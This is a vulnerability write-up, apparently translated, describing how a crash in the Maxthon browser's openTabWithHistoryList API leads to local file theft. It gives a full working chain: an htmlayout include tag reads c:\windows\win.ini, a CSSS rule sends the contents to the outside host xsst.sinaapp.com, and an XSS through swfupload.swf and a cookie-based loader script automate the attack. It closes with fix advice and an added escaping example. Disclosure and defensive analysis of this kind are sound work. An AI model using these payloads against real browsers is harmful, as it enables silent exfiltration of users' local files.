Maxthon (Aoyou) Browser: from a low-value crash to reading local files
Baidu Browser has not been updated yet, so I could only play with other browsers. While testing an API, running it a few times triggered a crash, and that crash turned out to allow reading local files ~~
1. I looked into Maxthon's privileged domain and the functions exposed by some of its APIs. For the API below I guessed at the parameters, and got no response (the test was run in the console under the http://i.maxthon.cn/ domain):
var x=new maxthon.browser.TabService();x.openTabWithHistoryList(["http://www.baidu.com"]);
2. But when I added a null value to the array on a hunch, the page refreshed. The code is as follows:
var x=new maxthon.browser.TabService();x.openTabWithHistoryList(["http://www.baidu.com",null]);
3. When I ran the code above several times in the console, for example with two nulls or three nulls, the following error message occasionally appeared:
4. After repeated tests it turned out to have nothing to do with the number of nulls: as long as the code from step 2 is run three times in a row, the browser shows the crash message above.
5. This is only a crash, and the exception is caught by the browser, so normal operation is not affected. But note the URL http://i.maxthon.cn/ shown on the crash page: if we make the crash happen at http://i.maxthon.cn/# followed by our own content, will that give us XSS?
6. Let's try. At http://i.maxthon.cn/# followed by an HTML test payload, run the [step 2] code three times. The result is shown below: HTML tags do not seem to be filtered, since a small image is rendered, but alert(1) is not executed.
7. The first thought is: is there rich-text filtering here? But it is unlikely that such a tedious solution would be used in a place like this. So where did alert(1) go? I changed the code slightly, tested again as in step 6 at http://i.maxthon.cn/#, and enabled Charles to capture packets. The captured request was:
8. This unusual User-Agent, htmlayout 3.3; Windows-7; www.terrainformatica.com), seems to mean something. A Google search for htmlayout (from Baidu Browser) shows that htmlayout is an HTML-based UI library whose rendering engine is H-SMILE, as shown below (image source: http://www.terrainformatica.com/wiki/start#htmlayout):
9. Because it is an independent rendering engine, its support for HTML tags and scripts differs from WebKit and the other common engines. So I downloaded the htmlayout SDK and checked the supported HTML tags and some of its features.
10. Since htmlayout is mainly used for UI display, it supports most common HTML tags and CSS styles, and it also extends HTML and CSS with its own tags and properties.
For example, here are some of its unique HTML tags (http://www.terrainformatica.com/htmlayout/tags.whtm), such as include and widget:
A. The include tag pulls in a sub-page (.htm), somewhat like the HTML template engines in use today. Typical code:
<include src="document-fragment.html"> <em>Ooops! document-fragment.html is unavailable!</em></include>
B. The widget tag, similar to a functional <div>, supports four different types:
<widget type="select"> - select block element;
<widget type="dropdown-select"> - dropdown select block element;
<widget type="textarea"> - textarea block element;
<widget type="htmlarea"> - htmlarea block element.
htmlayout itself does not support scripts (that is what Sciter adds), but it supports a technology called CSSS. CSSS is an extension of CSS that lets you write simple scripts inside CSS; these scripts mostly deal with how the UI is displayed and are not very powerful. For example, the following code (the hover-on handler fires when the mouse moves onto the element; it enables the hover state of the p.slave element and displays it in red):
10. Can security problems arise from the above? That is what we care about most. Executing commands looks impossible, because there is no tag or API for that purpose. But what about reading local files? So I first tested whether the <include> tag can include local files, for example <include src="file:///c:\windows\win.ini"/>, and found that the content is included normally, as shown below. How do we then send the content to the attacker's server? When we have XSS it is natural to think of new Image().src="http://hacker.com/?" followed by the sensitive data. As mentioned, htmlayout does not support JS, but it does support CSSS. After analysing the CSSS syntax, we can write the following code, which sends the included content out through the src attribute of an image:
<body><widget #test type="htmlarea"><include src="file:///c:\windows\win.ini" /></widget><style>widget#test > text{assigned!:$1(img#xx).src="http://www.baidu.com/?"+self:value;color:red;}</style></body>
This CSSS rule means: when the text inside the widget with id="test" is assigned its content, set the src attribute of the img with id="xx" to "http://www.baidu.com/?" followed by the assigned content. The resulting request is shown below:
11. In summary, to exploit this we first visit the following address:
http://i.maxthon.cn/#<body><widget #test type="htmlarea"><include src="file:///c:\windows\win.ini" /></widget><style>widget#test > text{assigned!:$1(img#xx).src="http://xsst.sinaapp.com/?"+self:value;color:red;}</style></body>
Then run the following code three times at that address:
var x=new maxthon.browser.TabService();x.openTabWithHistoryList(["http://www.baidu.com",null]);
The browser then crashes, renders the code above, and win.ini is sent to our server http://xsst.sinaapp.com.
12. To automate this process we first need an XSS under the maxthon.cn domain, which is not hard to find:
http://my.maxthon.cn//public/images/swfupload.swf?preventswfcaching=1414769360525&movieName=aaa"])}catch(e){alert(1)}//
Next we want this page to call openTabWithHistoryList three times automatically. The code is below: the first time, the code is stored in window.name; then we put the code into a cookie and the page calls openTabWithHistoryList. After the page reloads automatically, it reads the code from the cookie and executes it again. The loader code is placed at http://192.168.1.13/mx/poc1.js:
<script>window.name='document.cookie="payload='+escape('var s=document.createElement("script");s.src="http://192.168.1.13/mx/poc1.js?"+Math.random();document.body.appendChild(s);')+'; path=/; domain=maxthon.cn";';location.href='http://my.maxthon.cn//public/images/swfupload.swf?preventswfcaching=1414769360525&movieName=aaa"])}catch(e){if(!window.wy){window.wy=1;window.name%26%26eval(window.name);eval(unescape((document.cookie.match(/payload=([^;]%2b)/)||[0,0])[1]))}};//';</script>
The code of http://192.168.1.13/mx/poc1.js is as follows:
// Set the hash (the # part) to the markup that should be rendered after the crash.
// Backslashes in the path are escaped so the hash carries the literal c:\windows\win.ini.
location.hash = '<body><widget #test type="htmlarea"><include src="file:///c:\\windows\\win.ini" /></widget><style>widget#test > text{assigned!:$1(img#xx).src="http://xsst.sinaapp.com/?"+self:value;color:red;}</style></body>';
// Call openTabWithHistoryList. On the third call the page crashes with the error shown above.
var x = new maxthon.browser.TabService();
x.openTabWithHistoryList(["http://www.baidu.com", null]);
13. Finally we only need to visit the PoC page. After the page has refreshed three times through the defect in openTabWithHistoryList, the crash occurs, the code is rendered, and the user's local information is stolen. Tested successfully on my own machine (Win7 64-bit, Maxthon v4.4.2.2000) and in an XP virtual machine.
Fix: 1. The cause of the crash is still unknown and should be found and fixed. 2. HTML-encode the URL before it is output on the crash page.
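As an added illustration of the second fix (example code written for this page, not Maxthon's own source, which is not shown here), the JavaScript below contrasts a crash-page template that concatenates the failing URL into its markup with one that HTML-encodes it, and adds the further precaution of showing only the origin and path. The template text and the function names are hypothetical; the attack URL used as input is the one from step 11 above, embedded as a constructed test value.

```javascript
// Added example, not part of the original write-up or of Maxthon.
// The crash page renders the crashed tab's URL into htmlayout markup. Building that
// markup by string concatenation is what turns the fragment payload into live
// <widget>/<include>/<style> elements. Encoding the five HTML metacharacters before
// insertion neutralises it; dropping the fragment removes the attacker's input entirely.

// Constructed test input: the exploit URL from the write-up.
const ATTACK_URL =
  'http://i.maxthon.cn/#<body><widget #test type="htmlarea">' +
  '<include src="file:///c:\\windows\\win.ini" /></widget>' +
  '<style>widget#test > text{assigned!:$1(img#xx).src="http://xsst.sinaapp.com/?"+self:value;color:red;}</style></body>';

// Hypothetical vulnerable template: the URL is pasted into the markup unchanged.
function buildCrashPageUnsafe(url) {
  return '<html><body><p>The page ' + url + ' crashed.</p></body></html>';
}

// Encode the characters that can open a tag, close an attribute, or start an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened template: same layout, but the URL is encoded before insertion.
function buildCrashPageSafe(url) {
  return '<html><body><p>The page ' + escapeHtml(url) + ' crashed.</p></body></html>';
}

// Further reduction of attack surface: the fragment never reaches the server and is
// fully attacker-controlled, so the crash page only needs the origin and path.
function crashPageSubject(url) {
  try {
    const u = new URL(url);
    return escapeHtml(u.origin + u.pathname);
  } catch (e) {
    return escapeHtml(url); // not a parseable URL: still encoded, never raw
  }
}

// Check used only in this example: does the output still contain a start tag of the
// kinds the payload relies on? The encoded output must not.
function containsInjectedTag(markup) {
  return /<(include|widget|style)\b/i.test(markup);
}
```

With the unsafe template the output contains `<widget`, `<include` and `<style` verbatim, which is exactly what the H-SMILE engine then executes; with the encoded template they become `&lt;widget` and so on and render as text, and `crashPageSubject` reduces the attack URL to `http://i.maxthon.cn/`.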